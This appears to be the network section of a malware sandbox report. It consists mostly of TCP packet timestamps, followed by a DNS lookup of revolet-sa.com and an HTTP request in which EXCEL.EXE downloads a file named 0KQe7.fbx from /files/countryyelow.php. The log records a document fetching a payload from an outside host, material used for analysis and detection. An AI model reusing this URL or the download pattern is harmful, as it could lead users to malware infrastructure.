                            Apr 7, 2021 05:51:05.986488104 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986515999 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986545086 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986553907 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986584902 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986594915 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986610889 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986634970 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986656904 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986673117 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986711025 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986712933 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986747026 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986751080 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986784935 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986819029 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986839056 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986866951 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986896992 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986906052 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986932993 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986947060 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.986960888 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.986988068 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987018108 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987025976 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987063885 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987067938 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987107992 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987109900 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987137079 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987158060 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987175941 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987201929 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987227917 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987241030 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987267971 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987279892 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987291098 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987318993 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987354994 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987359047 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987374067 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987401009 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987416029 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987440109 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987467051 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987489939 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987495899 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987535954 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987554073 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987574100 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987595081 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987618923 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987637043 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987660885 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987688065 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987699986 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987709999 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987740993 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.987768888 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.987783909 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114264011 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114326954 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114366055 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114404917 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114442110 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114490986 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114535093 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114576101 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114608049 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114614964 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114645958 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114653111 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114655972 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114686966 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114697933 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114727020 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114737988 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114753008 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114778996 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114826918 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114846945 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114873886 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114903927 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114912033 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.114947081 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.114989042 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.115611076 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.115699053 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.115819931 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.115864038 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.115892887 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.115923882 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.117012978 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.117924929 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.119570017 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.119678974 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.119776011 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.119818926 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.119852066 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.119857073 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.119889975 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.119906902 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.119927883 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.119951010 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.119980097 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.119991064 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.120006084 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.120031118 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.120059967 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.120095968 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.120125055 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.120166063 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.120198011 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.120213985 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.120244026 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.120258093 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.120269060 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.120322943 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.120999098 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.121042967 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.121078968 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.121083975 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.121121883 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.121123075 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.121134043 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.121153116 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.121191025 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.122746944 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.123543024 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.124638081 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.124690056 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.124733925 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.124772072 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.124813080 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.124871016 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.125041008 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128146887 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128190994 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128303051 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128384113 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128427982 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128460884 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128467083 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128495932 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128508091 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128536940 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128547907 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128573895 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128588915 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128623962 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128669024 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128791094 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128833055 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128869057 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128899097 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128916979 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.128945112 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.128977060 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129009008 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129024029 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129103899 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129277945 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129322052 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129355907 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129359007 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129400015 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129437923 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129488945 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129550934 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129581928 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129590988 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129621983 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129632950 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129656076 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129689932 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129724979 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129729033 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129760027 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129770041 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129797935 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129810095 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129829884 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129848957 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129873991 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129899025 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129925013 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129937887 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.129951954 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.129987001 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130002975 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130029917 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130054951 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130069971 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130115032 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130121946 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130135059 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130183935 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130196095 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130237103 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130263090 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130289078 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130311966 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130357027 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130382061 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130426884 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130430937 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130498886 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130573988 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.130672932 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130932093 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.130956888 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131006002 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131047964 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131062031 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131072044 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131088018 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131093979 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131128073 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131165981 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131172895 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131186962 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131202936 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131216049 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131242990 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131267071 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131283045 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131325006 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131330013 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131339073 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131371021 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131407976 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131436110 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131444931 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131483078 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131557941 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131597042 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131623983 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131644011 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.131913900 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.131977081 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.145268917 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.147028923 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150475979 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150533915 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150583982 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150626898 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150628090 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150640011 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150659084 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150670052 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150671005 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150712967 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150728941 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150753021 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150753975 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150793076 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150806904 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150832891 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150851011 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150875092 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150876045 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150926113 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150932074 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.150970936 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.150981903 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151010036 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151026011 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151051044 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151058912 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151092052 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151108027 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151130915 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151160955 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151170969 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151184082 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151210070 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151226997 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151259899 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151262045 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151304007 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151323080 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151341915 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151356936 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151382923 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151398897 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151422977 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151429892 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151459932 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151470900 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151499033 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151514053 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151537895 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151547909 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151587009 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151588917 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151633024 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151634932 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151670933 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151683092 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151710987 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151721001 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151751041 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151757956 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151788950 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151803970 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151829004 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151833057 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151875019 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151875019 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151921988 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.151922941 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151964903 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.151968956 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.152003050 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.152013063 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.152040958 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.152050018 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.152071953 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:06.152098894 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.152115107 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.152549028 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:06.153465986 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:10.979485989 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:10.979808092 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:40.979610920 CEST8049165192.232.249.186192.168.2.22

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 7, 2021 05:51:04.550579071 CEST5219753192.168.2.228.8.8.8
                            Apr 7, 2021 05:51:04.719516039 CEST53521978.8.8.8192.168.2.22

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Apr 7, 2021 05:51:04.550579071 CEST192.168.2.228.8.8.80x1168Standard query (0)revolet-sa.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Apr 7, 2021 05:51:04.719516039 CEST8.8.8.8192.168.2.220x1168No error (0)revolet-sa.com192.232.249.186A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • revolet-sa.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.2249165192.232.249.18680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            TimestampkBytes transferredDirectionData
                            Apr 7, 2021 05:51:04.908396006 CEST0OUTGET /files/countryyelow.php HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: revolet-sa.com
                            Connection: Keep-Alive
                            Apr 7, 2021 05:51:05.299613953 CEST2INHTTP/1.1 200 OK
                            Date: Wed, 07 Apr 2021 03:51:04 GMT
                            Server: Apache
                            Content-Disposition: attachment; filename="0KQe7.fbx"
                            Upgrade: h2,h2c
                            Connection: Upgrade, Keep-Alive
                            Vary: Accept-Encoding
                            Content-Encoding: gzip
                            Keep-Alive: timeout=5, max=75
